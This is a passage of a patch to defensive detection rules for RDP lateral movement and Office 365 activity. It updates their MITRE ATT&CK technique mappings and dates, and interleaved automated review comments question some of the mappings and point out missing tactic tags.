--- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml
+++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/12"
 integration = ["lmd", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 
 [rule]
 anomaly_threshold = 70
@@ -95,14 +95,23 @@ Remote Desktop Protocol (RDP) facilitates remote access to systems, often target
 - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems have been compromised."""
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.001"
+name = "Remote Desktop Protocol"
+reference = "https://attack.mitre.org/techniques/T1021/001/"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
-
diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml
index db8f0b280e8..c4a9de77ab2 100644
--- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml
+++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/12"
 integration = ["lmd", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 
 [rule]
 anomaly_threshold = 70
@@ -96,14 +96,23 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating adm
 - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation."""
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.001"
+name = "Remote Desktop Protocol"
+reference = "https://attack.mitre.org/techniques/T1021/001/"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
-
diff --git a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml
index b4d4e4a8ff6..8b470800767 100644
--- a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml
+++ b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/12"
 integration = ["lmd", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 
 [rule]
 anomaly_threshold = 70
@@ -96,14 +96,31 @@ Machine learning models in security environments analyze file transfer patterns
 - Enhance monitoring and logging for unusual file transfer activities and remote access attempts to improve early detection of similar threats in the future."""
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
 
+[[rule.threat.technique]]
+id = "T1570"
+name = "Lateral Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1570/"
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1039"
+name = "Data from Network Shared Drive"
+reference = "https://attack.mitre.org/techniques/T1039/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
 
diff --git a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml
index bc0292876e8..28673a7b2a5 100644
--- a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml
+++ b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/12"
 integration = ["lmd", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 
 [rule]
 anomaly_threshold = 70
@@ -96,14 +96,23 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating leg
 - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected."""
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.001"
+name = "Remote Desktop Protocol"
+reference = "https://attack.mitre.org/techniques/T1021/001/"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
-
diff --git a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml
index 04f5ad44500..ea82363e132 100644
--- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml
+++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/12"
 integration = ["lmd", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 
 [rule]
 anomaly_threshold = 70
@@ -96,14 +96,18 @@ The 'Unusual Remote File Directory' detection leverages machine learning to iden
 - Update detection mechanisms and rules to enhance monitoring of less common directories and improve the detection of similar threats in the future."""
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
 
+[[rule.threat.technique]]
+id = "T1570"
+name = "Lateral Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1570/"
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
-
diff --git a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml
index 8cc42195af1..60be1f2cb83 100644
--- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml
+++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/12"
 integration = ["lmd", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 
 [rule]
 anomaly_threshold = 70
@@ -95,14 +95,18 @@ The detection of unusual remote file extensions leverages machine learning to id
 - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected."""
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
 
+[[rule.threat.technique]]
+id = "T1570"
+name = "Lateral Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1570/"
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
-
diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml
index 027b7598adf..53517117ac2 100644
--- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml
+++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/12"
 integration = ["lmd", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 
 [rule]
 anomaly_threshold = 70
@@ -96,14 +96,23 @@ Remote Desktop Protocol (RDP) is a common tool for remote management, but advers
 - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes, ensuring early detection of future attempts."""
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.001"
+name = "Remote Desktop Protocol"
+reference = "https://attack.mitre.org/techniques/T1021/001/"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
-
diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml
index e511ab60262..fb2dd4c72d8 100644
--- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml
+++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/12"
 integration = ["lmd", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 
 [rule]
 anomaly_threshold = 70
@@ -95,14 +95,23 @@ Remote Desktop Protocol (RDP) is crucial for remote management and troubleshooti
 - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes in the future, ensuring quick identification and response to potential threats."""
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.001"
+name = "Remote Desktop Protocol"
+reference = "https://attack.mitre.org/techniques/T1021/001/"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
-
diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml
index d5bcf1bf496..c39a26c3580 100644
--- a/rules/integrations/l
md/lateral_movement_ml_spike_in_rdp_processes.toml
+++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/12"
 integration = ["lmd", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 
 [rule]
 anomaly_threshold = 70
@@ -94,14 +94,23 @@ Remote Desktop Protocol (RDP) allows users to connect to other computers over a
 - Enhance monitoring and detection capabilities for RDP sessions by implementing stricter access controls and logging to detect similar anomalies in the future."""
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.001"
+name = "Remote Desktop Protocol"
+reference = "https://attack.mitre.org/techniques/T1021/001/"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
-
diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml
index d66e8ddd4dc..a0665035521 100644
--- a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml
+++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/12"
 integration = ["lmd", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 
 [rule]
 anomaly_threshold = 70
@@ -97,14 +97,18 @@ Remote file transfer technologies facilitate data sharing across networks, essen
 - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken."""
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
 
+[[rule.threat.technique]]
+id = "T1570"
+name = "Lateral Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1570/"
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
-
diff --git a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml
index be5de02f9db..c989b30fde8 100644
--- a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml
+++ b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/12"
 integration = ["lmd", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 
 [rule]
 anomaly_threshold = 70
@@ -96,14 +96,23 @@ Remote Desktop Protocol (RDP) enables remote access to systems, crucial for IT m
 - Implement enhanced monitoring on the affected system and related network segments to detect any further suspicious activities or attempts at unauthorized access."""
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.001"
+name = "Remote Desktop Protocol"
+reference = "https://attack.mitre.org/techniques/T1021/001/"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
-
diff --git a/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml b/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml
index 1ad36ca53cc..4883340158d 100644
--- a/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml
+++ b/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/18"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -169,22 +169,39 @@ event.dataset: "o365.audit" and
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1114"
 name = "Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1114.002"
 name = "Remote Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/002/"
-
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.001"
+name = "Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1550/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["o365.audit.ClientAppId"]
diff --git a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml
index e79eaca74da..4dda806d2f7 100644
--- a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml
+++ b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/19"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/02/24"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -150,6 +150,16 @@ reference = "https://attack.mitre.org/tactics/TA0009/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml index f2e5eb1098f..306442c5bcd 100644 --- a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml +++ b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/24" integration = ["o365"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,26 +86,27 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" - [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" 
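Review bot: T1567 Exfiltration Over Web Service describes pushing data *to* an external web service, whereas what this rule observes is bulk download *from* OneDrive, the opposite direction, and that activity is already covered by the Collection block the hunk header shows (`TA0009`); if a technique for the download itself is wanted, T1530 Data from Cloud Storage under Collection fits better than T1567. T1020 Automated Exfiltration likewise implies scripted transfer, which a download-count threshold cannot establish on its own, so if it stays the rule `note` should explain the inference. If the Exfiltration block is kept, `"Tactic: Exfiltration"` must also be present in the rule's `tags`, which no hunk for this file adds.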
@@ -114,3 +115,20 @@ id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml index bcad5515b25..a7b3d02a970 100644 --- a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml +++ b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
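Review bot: The new Execution/T1059.001 block asserts PowerShell execution from an O365 audit event, something this data source can only infer (presumably from a user-agent string in the query above the hunk) rather than observe, and user agents are trivially spoofable; if the mapping stays, the rule `note` should say the attribution is user-agent based. Adding a third tactic also requires `"Tactic: Execution"` in the rule's `tags`, and no hunk for this file touches `tags`. The enclosing `[rule]` section starts well before this hunk, so the tag change would land in a separate hunk.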
@@ -75,48 +75,67 @@ sequence by related.user with maxspan=30m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml index 692780a6416..f6a7afa5ec2 100644 --- a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml 
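Review bot: This rule now carries four `[[rule.threat]]` blocks (Credential Access, Persistence, Initial Access and the new Defense Evasion/T1550.001), but the `tags` list above this hunk is not updated anywhere in the patch, so `"Tactic: Defense Evasion"` needs to be added next to the existing tactic tags or the threat mapping and tags will disagree. The T1550.001 mapping only holds if the OAuth-redirected device registration is followed by use of the obtained token; that is an inference from the rule name rather than something the hunk shows, so it is worth one sentence in the rule `note`.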
+++ b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/01" integration = ["o365"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -188,48 +188,59 @@ from logs-o365.audit-* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_anti_phish_policy_deletion.toml b/rules/integrations/o365/defense_evasion_exchange_anti_phish_policy_deletion.toml index c1cad5d40cc..dbdd60ecb75 100644 
--- a/rules/integrations/o365/defense_evasion_exchange_anti_phish_policy_deletion.toml +++ b/rules/integrations/o365/defense_evasion_exchange_anti_phish_policy_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,18 +85,23 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_dkim_signing_config_disabled.toml b/rules/integrations/o365/defense_evasion_exchange_dkim_signing_config_disabled.toml index 07af6dc660d..004e5b760f0 100644 --- a/rules/integrations/o365/defense_evasion_exchange_dkim_signing_config_disabled.toml +++ b/rules/integrations/o365/defense_evasion_exchange_dkim_signing_config_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
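Review bot: T1484 Domain or Tenant Policy Modification is defined around identity-tenant and directory configuration (GPOs, federation and trust settings), so mapping it to the deletion of an Exchange Online anti-phish policy stretches the technique, and the existing T1562.001 block already captures disabling a protective control. The same three `T1484` lines are added to the DKIM, Safe Links, malware-filter-rule, Teams and SharePoint hunks of this patch; the SharePoint sharing-policy and Teams federation rules are a reasonable fit for tenant policy, the mail-filter rules are the weakest. If the mapping is intentional, each rule's `note` should carry a one-line rationale (for example, that M365 service-wide protection policies are being treated as tenant policy); otherwise I'd drop the `[[rule.threat.technique]]` T1484 entry from the mail-filter rules.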
@@ -78,18 +78,23 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml index 8574d32b915..110b2b65dbd 100644 --- a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml +++ b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,11 +80,16 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/integrations/o365/defense_evasion_exchange_exchange_safelinks_disabled.toml b/rules/integrations/o365/defense_evasion_exchange_exchange_safelinks_disabled.toml index 2291a229ffe..ec6089b3a23 100644 --- a/rules/integrations/o365/defense_evasion_exchange_exchange_safelinks_disabled.toml 
+++ b/rules/integrations/o365/defense_evasion_exchange_exchange_safelinks_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,18 +83,23 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml index 1a63debc029..cb297e6c510 100644 --- a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml +++ b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/13" integration = ["o365"] maturity = "production" -updated_date = 